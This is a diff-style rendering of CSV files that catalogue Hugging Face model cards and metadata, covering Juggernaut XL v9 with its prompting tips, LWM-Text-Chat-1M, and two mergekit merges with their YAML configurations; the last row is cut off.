|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
RunDiffusion/Juggernaut-XL-v9,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
license: creativeml-openrail-m
|
| 6 |
+
library_name: diffusers
|
| 7 |
+
tags:
|
| 8 |
+
- art
|
| 9 |
+
- people
|
| 10 |
+
- diffusion
|
| 11 |
+
- Cinematic
|
| 12 |
+
- Photography
|
| 13 |
+
- Landscape
|
| 14 |
+
- Interior
|
| 15 |
+
- Food
|
| 16 |
+
- Car
|
| 17 |
+
- Wildlife
|
| 18 |
+
- Architecture
|
| 19 |
+
thumbnail: >-
|
| 20 |
+
https://imagedelivery.net/siANnpeNAc_S2q1M3-eDrA/c200a026-c151-49c7-afbc-241fe943b300/padthumb
|
| 21 |
+
base_model: stabilityai/stable-diffusion-xl-base-1.0
|
| 22 |
+
pipeline_tag: text-to-image
|
| 23 |
+
---
|
| 24 |
+
|
| 25 |
+
# Juggernaut XL v9 + RunDiffusion Photo v2 Official
|
| 26 |
+
[](https://rundiffusion.com)
|
| 27 |
+
Check out the team behind this amazing model! We're happy to help you build your Ai models!
|
| 28 |
+
|
| 29 |
+

|
| 30 |
+
|
| 31 |
+
This model is not permitted to be used behind API services. Please contact [juggernaut@rundiffusion.com](mailto:juggernaut@rundiffusion.com) for business inquires, commercial licensing, custom models, and consultation.
|
| 32 |
+
|
| 33 |
+
Juggernaut is available on the new Auto1111 Forge on [RunDiffusion](http://rundiffusion.com/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo)
|
| 34 |
+
|
| 35 |
+
A big thanks for Version 9 goes to [RunDiffusion](http://rundiffusion.com/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo) ([Photo Model](https://rundiffusion.com/rundiffusion-photo/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo)) and [Adam](https://twitter.com/Colorblind_Adam), who diligently helped me test :) (Leave some love for them ;) )
|
| 36 |
+
|
| 37 |
+
It's time for another round, this time a bit delayed, but I hope you forgive the delay. Let's dive straight into the changes that await you or what we've been working on lately:
|
| 38 |
+
|
| 39 |
+
For V9, I myself have only done basic training. This involves some work on skin details, lighting, and overall contrast. However, the biggest change to the model came from the [RunDiffusion Photo Model](https://rundiffusion.com/rundiffusion-photo/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo) update, which was made available to me in V2 by [RunDiffusion.com](https://rundiffusion.com/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo). The photographic output of the model should, in our experience, be even stronger than in previous versions.
|
| 40 |
+
|
| 41 |
+
Now for a small ""roadmap"" update, or a general status update on how things are progressing with Juggernaut. As you may have noticed, there was a slight delay with V9. With each successive version, it has become increasingly difficult to train Juggernaut without sacrificing quality in some areas, which was already the case to some extent with V8. Don't worry, V9 is really good, and I'm satisfied with the version I can present to you today :) However, I've decided to go for a complete ""reboot"" for V10. I want to simply retrain the Juggernaut base set. The conditions for better captioning weren't as favorable ""back then"" as they are today, so I want to completely re-caption the base set (5k images) with GPT-4 Vision. I expect a big leap towards prompting guidance and quality.
|
| 42 |
+
|
| 43 |
+
But as you surely noticed last week, the release of Stable Cascade got in the way a bit. Therefore, my focus in the coming weeks will be on training Juggernaut for Stable Cascade. The approach remains the same as with the planned ""reboot""; I want to caption/tag all images in the future only with GPT-4 or manually. The timeline for all of this is still uncertain. I hope to be able to present you with a first stable version of Juggernaut Cascade sometime in March. V10 of Juggernaut XL will follow in the weeks thereafter.
|
| 44 |
+
|
| 45 |
+
Now, here are some additional tips to make prompting easier for you:
|
| 46 |
+
|
| 47 |
+
- Res: 832x1216
|
| 48 |
+
- Sampler: DPM++ 2M Karras
|
| 49 |
+
- Steps: 30-40 CFG: 3-7 (less is
|
| 50 |
+
a bit more realistic)
|
| 51 |
+
- Negative: Start with no negative, and add afterwards the Stuff you don't want to see in that image. I don't recommend using my Negative Prompt, i simply use it because i am lazy :D
|
| 52 |
+
|
| 53 |
+
VAE is already Baked In
|
| 54 |
+
HiRes: 4xNMKD-Siax_200k with 15 Steps and 0.3 Denoise + 1.5 Upscale
|
| 55 |
+
And a few keywords/tokens that I regularly use in training, which might help you achieve the optimal result from the version:
|
| 56 |
+
|
| 57 |
+
- Architecture Photography
|
| 58 |
+
- Wildlife Photography
|
| 59 |
+
- Car Photography
|
| 60 |
+
- Food Photography
|
| 61 |
+
- Interior Photography
|
| 62 |
+
- Landscape Photography
|
| 63 |
+
- Hyperdetailed Photography
|
| 64 |
+
- Cinematic Movie
|
| 65 |
+
- Still Mid Shot Photo
|
| 66 |
+
- Full Body Photo
|
| 67 |
+
- Skin Details
|
| 68 |
+
|
| 69 |
+
","{""id"": ""RunDiffusion/Juggernaut-XL-v9"", ""author"": ""RunDiffusion"", ""sha"": ""b2d4ff8089889ad0a63a2f93a14e2cf6059bfdbb"", ""last_modified"": ""2024-12-11 19:56:01+00:00"", ""created_at"": ""2024-02-18 21:05:03+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 173208, ""downloads_all_time"": null, ""likes"": 195, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""art"", ""people"", ""diffusion"", ""Cinematic"", ""Photography"", ""Landscape"", ""Interior"", ""Food"", ""Car"", ""Wildlife"", ""Architecture"", ""text-to-image"", ""en"", ""base_model:stabilityai/stable-diffusion-xl-base-1.0"", ""base_model:finetune:stabilityai/stable-diffusion-xl-base-1.0"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionXLPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: stabilityai/stable-diffusion-xl-base-1.0\nlanguage:\n- en\nlibrary_name: diffusers\nlicense: creativeml-openrail-m\npipeline_tag: text-to-image\ntags:\n- art\n- people\n- diffusion\n- Cinematic\n- Photography\n- Landscape\n- Interior\n- Food\n- Car\n- Wildlife\n- Architecture\nthumbnail: https://imagedelivery.net/siANnpeNAc_S2q1M3-eDrA/c200a026-c151-49c7-afbc-241fe943b300/padthumb"", ""widget_data"": null, ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionXLPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Juggernaut-XL_v9_RunDiffusionPhoto_v2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder_2/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder_2/model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [""SakanaAI/EvoSDXL-JP"", ""ChenoAi/JuggernautXL-Playground"", ""SakanaAI/Evo-Ukiyoe"", ""SakanaAI/Evo-Nishikie"", ""andyaii/Images"", ""smartfeed/image2image"", ""RSPMetaAdmin/WebUIwControlNetwXL_Group1"", ""RSPMetaAdmin/WebUIwControlNetwXL_Group2"", ""qyoo/AID-v2"", ""tsqn/PhotoMaker-V2"", ""cbensimon/Evo-Ukiyoe"", ""tianaco/tianacomakethedot"", ""Adx13/v9_RDOhoto_Lightning_V1_BETA"", ""cocktailpeanut/EvoSDXL-JP"", ""benskibenski/JingleSharkStories"", ""charismao/RunDiffusion-Juggernaut-XL-v9"", ""Hello007007/RunDiffusion-Juggernaut-XL-v9"", ""jasoncharles/StoryDiffusion"", ""mberke11/content"", ""mberke11/story"", ""Raviii98/RunDiffusion-Juggernaut-XL-v9"", ""FlexTheAi/Flexstorydiff"", ""qvila/JuggernautXL-Playground"", ""jmartins94/RunDiffusion-Juggernaut-XL-v9"", ""jmartins94/TestRunDiffusion-Juggernaut-XL-v9"", ""FriedMain321/Juggernaut-XL-v9-Sandbox-V1"", ""sanjayxm/PuLiD-Flux"", ""henryas/storydiffusion"", ""sukma13/RunDiffusion-Juggernaut-XL-v9"", ""doublelotus/colorsteven"", ""farah6/RunDiffusion-Juggernaut-XL-v9"", ""iniapi/Images"", ""ebonyo/TTIforSLA""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-11 19:56:01+00:00"", ""cardData"": ""base_model: stabilityai/stable-diffusion-xl-base-1.0\nlanguage:\n- en\nlibrary_name: diffusers\nlicense: creativeml-openrail-m\npipeline_tag: text-to-image\ntags:\n- art\n- people\n- diffusion\n- Cinematic\n- Photography\n- Landscape\n- Interior\n- Food\n- Car\n- Wildlife\n- Architecture\nthumbnail: https://imagedelivery.net/siANnpeNAc_S2q1M3-eDrA/c200a026-c151-49c7-afbc-241fe943b300/padthumb"", ""transformersInfo"": null, ""_id"": ""65d270fff2da55d0a81123b7"", ""modelId"": ""RunDiffusion/Juggernaut-XL-v9"", ""usedStorage"": 27919048054}",0,,0,https://huggingface.co/zac/oliy,1,,0,,0,"ChenoAi/JuggernautXL-Playground, RSPMetaAdmin/WebUIwControlNetwXL_Group1, RSPMetaAdmin/WebUIwControlNetwXL_Group2, SakanaAI/Evo-Nishikie, SakanaAI/Evo-Ukiyoe, SakanaAI/EvoSDXL-JP, andyaii/Images, ebonyo/TTIforSLA, farah6/RunDiffusion-Juggernaut-XL-v9, huggingface/InferenceSupport/discussions/new?title=RunDiffusion/Juggernaut-XL-v9&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BRunDiffusion%2FJuggernaut-XL-v9%5D(%2FRunDiffusion%2FJuggernaut-XL-v9)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, qyoo/AID-v2, smartfeed/image2image, sukma13/RunDiffusion-Juggernaut-XL-v9",13
|
LWM-Text-Chat-1M_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,128 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
LargeWorldModel/LWM-Text-Chat-1M,"---
|
| 3 |
+
inference: false
|
| 4 |
+
---
|
| 5 |
+
|
| 6 |
+
<br>
|
| 7 |
+
<br>
|
| 8 |
+
|
| 9 |
+
# LWM-Text-1M-Chat Model Card
|
| 10 |
+
|
| 11 |
+
## Model details
|
| 12 |
+
|
| 13 |
+
**Model type:**
|
| 14 |
+
LWM-Text-1M-Chat is an open-source model trained from LLaMA-2 on a subset of Books3 filtered data. It is an auto-regressive language model, based on the transformer architecture.
|
| 15 |
+
|
| 16 |
+
**Model date:**
|
| 17 |
+
LWM-Text-1M-Chat was trained in December 2023.
|
| 18 |
+
|
| 19 |
+
**Paper or resources for more information:**
|
| 20 |
+
https://largeworldmodel.github.io/
|
| 21 |
+
|
| 22 |
+
## License
|
| 23 |
+
Llama 2 is licensed under the LLAMA 2 Community License,
|
| 24 |
+
Copyright (c) Meta Platforms, Inc. All Rights Reserved.
|
| 25 |
+
|
| 26 |
+
**Where to send questions or comments about the model:**
|
| 27 |
+
https://github.com/LargeWorldModel/lwm/issues
|
| 28 |
+
|
| 29 |
+
## Training dataset
|
| 30 |
+
- 800 subset of Books3 documents with 1M plus tokens","{""id"": ""LargeWorldModel/LWM-Text-Chat-1M"", ""author"": ""LargeWorldModel"", ""sha"": ""0598c443b02aeb1a1f9f6788e9af85ea762a452d"", ""last_modified"": ""2024-02-11 08:20:34+00:00"", ""created_at"": ""2024-02-07 05:36:19+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1817, ""downloads_all_time"": null, ""likes"": 174, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llama"", ""text-generation"", ""autotrain_compatible"", ""text-generation-inference"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""inference: false"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""pad_token"": null, ""bos_token"": {""__type"": ""AddedToken"", ""content"": ""<s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""eos_token"": {""__type"": ""AddedToken"", ""content"": ""</s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""unk_token"": {""__type"": ""AddedToken"", ""content"": ""<unk>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00001-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00002-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-02-11 08:20:34+00:00"", ""cardData"": ""inference: false"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65c316d3b911dda8cb6fadad"", ""modelId"": ""LargeWorldModel/LWM-Text-Chat-1M"", ""usedStorage"": 26954326092}",0,"https://huggingface.co/mergekit-community/mergekit-slerp-ozbsicw, https://huggingface.co/mergekit-community/LWM-14b-Text-Chat-1M",2,,0,"https://huggingface.co/mradermacher/LWM-Text-Chat-1M-GGUF, https://huggingface.co/mradermacher/LWM-Text-Chat-1M-i1-GGUF",2,"https://huggingface.co/mergekit-community/llama-world, https://huggingface.co/fradinho/world-llama2",2,huggingface/InferenceSupport/discussions/new?title=LargeWorldModel/LWM-Text-Chat-1M&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BLargeWorldModel%2FLWM-Text-Chat-1M%5D(%2FLargeWorldModel%2FLWM-Text-Chat-1M)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 31 |
+
mergekit-community/mergekit-slerp-ozbsicw,"---
|
| 32 |
+
base_model:
|
| 33 |
+
- LargeWorldModel/LWM-Text-Chat-1M
|
| 34 |
+
library_name: transformers
|
| 35 |
+
tags:
|
| 36 |
+
- mergekit
|
| 37 |
+
- merge
|
| 38 |
+
|
| 39 |
+
---
|
| 40 |
+
# merge
|
| 41 |
+
|
| 42 |
+
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
|
| 43 |
+
|
| 44 |
+
## Merge Details
|
| 45 |
+
### Merge Method
|
| 46 |
+
|
| 47 |
+
This model was merged using the SLERP merge method.
|
| 48 |
+
|
| 49 |
+
### Models Merged
|
| 50 |
+
|
| 51 |
+
The following models were included in the merge:
|
| 52 |
+
* [LargeWorldModel/LWM-Text-Chat-1M](https://huggingface.co/LargeWorldModel/LWM-Text-Chat-1M)
|
| 53 |
+
|
| 54 |
+
### Configuration
|
| 55 |
+
|
| 56 |
+
The following YAML configuration was used to produce this model:
|
| 57 |
+
|
| 58 |
+
```yaml
|
| 59 |
+
slices:
|
| 60 |
+
- sources:
|
| 61 |
+
- model: LargeWorldModel/LWM-Text-Chat-1M
|
| 62 |
+
layer_range:
|
| 63 |
+
- 0
|
| 64 |
+
- 32
|
| 65 |
+
- model: LargeWorldModel/LWM-Text-Chat-1M
|
| 66 |
+
layer_range:
|
| 67 |
+
- 0
|
| 68 |
+
- 32
|
| 69 |
+
merge_method: slerp
|
| 70 |
+
base_model: LargeWorldModel/LWM-Text-Chat-1M
|
| 71 |
+
parameters:
|
| 72 |
+
t:
|
| 73 |
+
- filter: self_attn
|
| 74 |
+
value:
|
| 75 |
+
- 0
|
| 76 |
+
- 0.5
|
| 77 |
+
- 0.3
|
| 78 |
+
- 0.7
|
| 79 |
+
- 1
|
| 80 |
+
- filter: mlp
|
| 81 |
+
value:
|
| 82 |
+
- 1
|
| 83 |
+
- 0.5
|
| 84 |
+
- 0.7
|
| 85 |
+
- 0.3
|
| 86 |
+
- 0
|
| 87 |
+
- value: 0.5
|
| 88 |
+
dtype: bfloat16
|
| 89 |
+
```
|
| 90 |
+
","{""id"": ""mergekit-community/mergekit-slerp-ozbsicw"", ""author"": ""mergekit-community"", ""sha"": ""7b139d363aaf71594c14b315903cb2a520c34f8b"", ""last_modified"": ""2024-04-10 19:31:24+00:00"", ""created_at"": ""2024-04-10 19:29:43+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 7, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""llama"", ""text-generation"", ""mergekit"", ""merge"", ""base_model:LargeWorldModel/LWM-Text-Chat-1M"", ""base_model:finetune:LargeWorldModel/LWM-Text-Chat-1M"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": null, ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mergekit_config.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 6738415616}, ""total"": 6738415616}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-04-10 19:31:24+00:00"", ""cardData"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6616e8a77ed574892061b733"", ""modelId"": ""mergekit-community/mergekit-slerp-ozbsicw"", ""usedStorage"": 13477364787}",1,,0,,0,https://huggingface.co/MaziyarPanahi/mergekit-slerp-ozbsicw-GGUF,1,,0,huggingface/InferenceSupport/discussions/new?title=mergekit-community/mergekit-slerp-ozbsicw&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmergekit-community%2Fmergekit-slerp-ozbsicw%5D(%2Fmergekit-community%2Fmergekit-slerp-ozbsicw)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 91 |
+
mergekit-community/LWM-14b-Text-Chat-1M,"---
|
| 92 |
+
base_model:
|
| 93 |
+
- LargeWorldModel/LWM-Text-Chat-1M
|
| 94 |
+
library_name: transformers
|
| 95 |
+
tags:
|
| 96 |
+
- mergekit
|
| 97 |
+
- merge
|
| 98 |
+
|
| 99 |
+
---
|
| 100 |
+
# merge
|
| 101 |
+
|
| 102 |
+
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
|
| 103 |
+
|
| 104 |
+
## Merge Details
|
| 105 |
+
### Merge Method
|
| 106 |
+
|
| 107 |
+
This model was merged using the linear [DARE](https://arxiv.org/abs/2311.03099) merge method using [LargeWorldModel/LWM-Text-Chat-1M](https://huggingface.co/LargeWorldModel/LWM-Text-Chat-1M) as a base.
|
| 108 |
+
|
| 109 |
+
### Models Merged
|
| 110 |
+
|
| 111 |
+
The following models were included in the merge:
|
| 112 |
+
|
| 113 |
+
|
| 114 |
+
### Configuration
|
| 115 |
+
|
| 116 |
+
The following YAML configuration was used to produce this model:
|
| 117 |
+
|
| 118 |
+
```yaml
|
| 119 |
+
merge_method: dare_linear
|
| 120 |
+
base_model: LargeWorldModel/LWM-Text-Chat-1M
|
| 121 |
+
models:
|
| 122 |
+
- model: LargeWorldModel/LWM-Text-Chat-1M
|
| 123 |
+
- model: LargeWorldModel/LWM-Text-Chat-1M
|
| 124 |
+
parameters:
|
| 125 |
+
weight: 1.0
|
| 126 |
+
dtype: float16
|
| 127 |
+
```
|
| 128 |
+
","{""id"": ""mergekit-community/LWM-14b-Text-Chat-1M"", ""author"": ""mergekit-community"", ""sha"": ""58c26d7dcd89051e8ae14a79ac80902140f98392"", ""last_modified"": ""2024-04-10 19:39:03+00:00"", ""created_at"": ""2024-04-10 19:37:28+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 3, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""llama"", ""text-generation"", ""mergekit"", ""merge"", ""arxiv:2311.03099"", ""base_model:LargeWorldModel/LWM-Text-Chat-1M"", ""base_model:finetune:LargeWorldModel/LWM-Text-Chat-1M"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": null, ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mergekit_config.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 6738415616}, ""total"": 6738415616}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-04-10 19:39:03+00:00"", ""cardData"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6616ea78260feb96942352d0"", ""modelId"": ""mergekit-community/LWM-14b-Text-Chat-1M"", ""usedStorage"": 